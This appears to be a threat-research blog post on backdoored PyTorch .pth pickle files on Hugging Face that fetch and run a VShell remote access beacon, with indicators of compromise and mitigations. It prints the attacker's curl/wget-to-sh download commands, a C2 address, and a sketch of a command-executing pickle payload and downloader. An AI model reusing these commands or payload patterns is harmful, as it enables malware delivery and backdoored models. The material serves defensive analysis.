Executive summary
Recent threat research highlights a growing risk in the Python and machine learning (ML) ecosystem: the exploitation of serialized model files, specifically those using Python’s pickle module. While commonly used for saving and loading ML models, pickle files can execute arbitrary code upon deserialization — a feature increasingly abused by threat actors.
Our investigation uncovered malicious PyTorch model files uploaded to trusted platforms like Hugging Face. These weaponized .pth files contain embedded backdoors that, when loaded, execute system-level commands to download and run remote access trojans (RATs). In one case, the payload was a Go-based ELF binary reaching out to a command-and-control server hidden behind Cloudflare Tunnel — a technique designed to evade attribution and traditional network defenses.
This attack vector underscores the need for stronger validation of third-party ML models, tighter controls on deserialization behavior, and heightened awareness of the risks tied to open-source dependencies in AI and data science workflows.
Key findings
Malicious .pth PyTorch model files were uploaded to Hugging Face under a suspicious user account.
Upon deserialization via torch.load(), the pickle files executed embedded shell commands to download and run ELF binaries.
Payloads contacted a VShell C2 endpoint using Cloudflare Tunnel to evade attribution and network defenses.
The technique exploits trusted AI platforms and relies on pickle’s capability to execute arbitrary code, a known yet often overlooked risk.
What did we discover?
In the realm of Python development, the pickle module has long been a go-to for serializing and deserializing complex objects. Its convenience, however, belies a lurking danger: the potential for malicious code execution during the unpickling process.
In Python, the pickle module is like a storage jar for your code — it lets you save complex objects, like lists, models, or custom classes, and bring them back later just as they were. This process is called pickling (saving) and unpickling (loading). It's useful when you want to preserve the state of a program, but there's a catch: unpickling can run code hidden in the file, which makes it dangerous to use with data from untrusted sources.
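To make that concrete, here is a minimal, benign sketch of the round trip; the object and file name are illustrative:

```python
import pickle

# Pickling: serialize a Python object to bytes and write it to disk.
model_state = {"weights": [0.12, -0.08, 0.33], "epoch": 3}
with open("state.pkl", "wb") as f:
    pickle.dump(model_state, f)

# Unpickling: read the bytes back and rebuild the object as it was.
# This is the dangerous step with untrusted files, because the pickle
# stream can instruct the interpreter to call arbitrary functions.
with open("state.pkl", "rb") as f:
    restored = pickle.load(f)

assert restored == model_state
```

The danger lives entirely in the load step: pickle.load() executes whatever instructions the stream contains, not just the data.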
This vulnerability is not just theoretical; real-world instances have demonstrated the risk. For example, researchers have identified malicious pickle files that, when unpickled, deploy payloads using tools like Cobalt Strike and Metasploit. These files often masquerade as legitimate ML models, exploiting the trust users place in shared model repositories.
In our recent threat research into the abuse of and hunt for malicious pickle files, Rapid7 Labs identified an attack vector in which malicious actors weaponize Python pickle-based model files (.pth) to deploy remote access trojans (RATs). This technique abuses trusted machine learning repositories — in this case, Hugging Face — as distribution channels for malware. Secondarily, side-loading pickle files through a Python ML library's load routine is a novel way of abusing living-off-the-land tooling already present on the operating system.
Analysis
Our analysis centers on a suspicious user account that uploaded backdoored PyTorch model files to Hugging Face. These .pth files carried embedded malicious payloads that, when deserialized, executed system commands to download and run shell scripts or ELF binaries.
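The mechanics are simple to reproduce. The sketch below is illustrative only: it substitutes a harmless echo for the attacker's downloader one-liner and assumes a __reduce__-style payload, the most common way to weaponize a pickle stream.

```python
import os
import pickle

class Payload:
    def __reduce__(self):
        # __reduce__ tells pickle how to rebuild this object on load.
        # Returning (os.system, (cmd,)) makes deserialization run cmd.
        return (os.system, ("echo simulated payload executed",))

blob = pickle.dumps(Payload())

# The moment a victim deserializes the blob, the command executes.
# torch.load() on a .pth containing such a stream behaves the same way,
# because it unpickles the file's contents under the hood.
pickle.loads(blob)
```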
The attacker uploaded multiple .pth files to their Hugging Face repository:
8TX8.pth
kcp.pth
ws.pth
wsc.pth
As the screenshot below shows, Hugging Face already displays a warning about the files' reputation.
[Screenshot: Hugging Face warning on the uploaded .pth files]
Analysis of the files:
kcp.pth contains the following command:
"(curl -fsSL -m180 194.34.254.219:10410/slk || wget -T180 -q 194.34.254.219:10410/slk)|sh"
When executed, it tries to silently download a remote file (/slk) using curl. If that fails, it falls back to wget. After downloading, it pipes the result directly into sh, executing the script without writing it to disk.
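For analysts, the embedded command can be recovered without executing the file. A minimal sketch, assuming the .pth is a raw pickle stream (which the small file sizes suggest) rather than PyTorch's newer zip-based format, whose inner data.pkl would first need extracting:

```python
import pickletools

# Disassemble the pickle opcodes without executing any of them.
# GLOBAL/STACK_GLOBAL entries resolving to callables such as
# 'posix system' or 'os system' are a strong signal of an embedded
# command payload like the curl/wget one-liner above.
with open("kcp.pth", "rb") as f:
    pickletools.dis(f.read())
```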
The ws.pth file contains a similar command, with a slightly different remote file name:
"(curl -fsSL -m180 194.34.254.219:10410/slw || wget -T180 -q 194.34.254.219:10410/slw)|sh"
The content downloaded from slk/slw is almost identical to the code discovered in the wsc.pth file.
The biggest difference is that the slk/slw files download the main backdoor from the same C2 server,
“hxxp://194.34.254.219:10404/?h=194.34.254.219&p=10404&t=kcp&a=l64&stage=false&encode=false”
whereas in the wsc.pth file, the main backdoor file is downloaded from the same Hugging Face repo.
Restructured, the code looks like this:
[Screenshot: restructured code recovered from wsc.pth]
In short, once the script determines the system architecture, it downloads a file called “ws_linux_amd64” from the same Hugging Face account that hosts the other pickle files. Once retrieved, the file is assigned execution rights by the script, and the newly downloaded ws_linux_amd64 is run.
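For clarity, here is a hypothetical Python rendering of that flow. The actual payload is a shell script, and the repository path below is a placeholder, not the attacker's real URL:

```python
import os
import platform
import stat
import urllib.request

# Hypothetical re-implementation of the downloader logic described above.
arch = platform.machine()            # the script branches on architecture
if arch in ("x86_64", "amd64"):
    name = "ws_linux_amd64"          # beacon hosted in the same Hugging Face repo
    url = "https://huggingface.co/<attacker-repo>/resolve/main/" + name  # placeholder
    urllib.request.urlretrieve(url, name)
    # Assign execute rights, then run the freshly downloaded beacon.
    os.chmod(name, os.stat(name).st_mode | stat.S_IXUSR)
    os.execv(os.path.abspath(name), [name])
```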
The beacon file: ws_linux_amd64
File: ELF 64-bit
MD5: 8B58B07E167AA2BB975A3FCE8F6B1B21
SHA1: 24D0D7FF7FA7EE8723F2CB49220170608AA8C579
SHA256: 0AA6F668E4A231D2B450F27EDC0037513E9F1CBB308E923F79C393E9890D8A73
Analysis of the downloaded file shows it is an ELF binary written in Go. When executed, it attempts to reach its C2 server, at the time of analysis hosted at:
hxxp://molecular-mazda-forests-shop.trycloudflare[.]com
The attacker uses Cloudflare Tunnel to avoid attribution and bypass network controls, a tactic that is increasingly popular among threat actors.
The C2 endpoint was hosting the VShell C2 page:
[Screenshot: VShell page hosted at the C2 endpoint]
Analysis of the malware configuration shows that this ELF sample — or, as we would classify it, a beacon — was built with VShell. Part of the config code:
"Vkey":"vshell","proxy":"","salt":"vshelladfg","l":false,"e":false
VShell is a cross-platform command-and-control (C2) framework originally designed for red team operations but increasingly adopted by malicious actors. Written in Go, it supports Windows, Linux, and macOS, offering capabilities such as remote command execution, file transfer, and in-memory (fileless) operation via encrypted WebSocket communication — making it stealthy and harder to detect. It has been observed being used in real-world attacks, including campaigns by suspected Chinese state-sponsored groups like UNC5174. The developer has removed the project’s source code from GitHub; however, cloned and modified versions continue to circulate.
Conclusion
The abuse of pickle deserialization in open-source AI models represents a potent blend of software supply chain compromise and evasive C2 tactics. As AI becomes more embedded in production environments, defenders must treat model files with the same scrutiny as executable code.
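One practical control, assuming a reasonably recent PyTorch (1.13 or later), is to refuse full unpickling when loading third-party weights:

```python
import torch

# weights_only=True restricts deserialization to tensors and a small
# allowlist of primitive types, so a pickle stream that tries to call
# os.system (as in the .pth files above) raises an error instead of
# executing. The file name is illustrative.
state_dict = torch.load("third_party_model.pth",
                        map_location="cpu",
                        weights_only=True)
```

Formats that avoid pickle altogether, such as safetensors, sidestep this class of risk entirely.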
MITRE ATT&CK mapping
Tactic | Technique ID | Technique Name
Execution | T1059.004 | Command and Scripting Interpreter: Unix Shell
Execution | T1203 | Exploitation for Client Execution
Defense Evasion | T1218 | System Binary Proxy Execution (torch.load)
Command & Control | T1071.001 | Application Layer Protocol: Web Protocols
Command & Control | T1090.001 | Proxy: Internal Proxy (Cloudflare Tunnel)
Defense Evasion | T1027 | Obfuscated Files or Information
Command & Control | T1105 | Ingress Tool Transfer (remote scripts and binaries)
Indicators of compromise
A full list of the indicators we researched in this blog can be found below.
Files:
Filename: ws.pth
Filesize: 495 bytes (495 B)
MD5: 5925ee590d5a03efdcbc38c6e6078fae
SHA1: 4cc45d1ae409b58794e84d06161ef8d779e62de2
SHA256: 6cb644fb1e1739b6907a86bddff7452bd965a08f21c3b70f13410e22d11b219b
Filename: wsc.pth
Filesize: 1583 bytes (1.5 KB)
MD5: c26a2e09028b17eac33cf5e070c6b9f2
SHA1: 6927b8ebe37da19e3996f0c5dc657c95fbf00b0a
SHA256: 06b4c8c7032dc5619f18e6f0ebeae71ce06ea96b10214ca9b693cfb589c4bb6d
Filename: kcp.pth
Filesize: 495 bytes (495 B)
MD5: b7ceab9e2b77db38b0966911c418f589
SHA1: 7276a9a5fe41ead88a328cb952c790e3b7d3414f
SHA256: d0055d902fcb3a34e33a2d44a0b10f83d12b76fe5616c102613a36b44311d1b8
Filename: ws_linux_amd64
Filesize: 2945204 bytes (2.8 MB)
MD5: 8b58b07e167aa2bb975a3fce8f6b1b21
SHA1: 24d0d7ff7fa7ee8723f2cb49220170608aa8c579
SHA256: 0aa6f668e4a231d2b450f27edc0037513e9f1cbb308e923f79c393e9890d8a73
Network:
hxxp://molecular-mazda-forests-shop.trycloudflare[.]com
194.34.254.219:10410
194.34.254.219:10404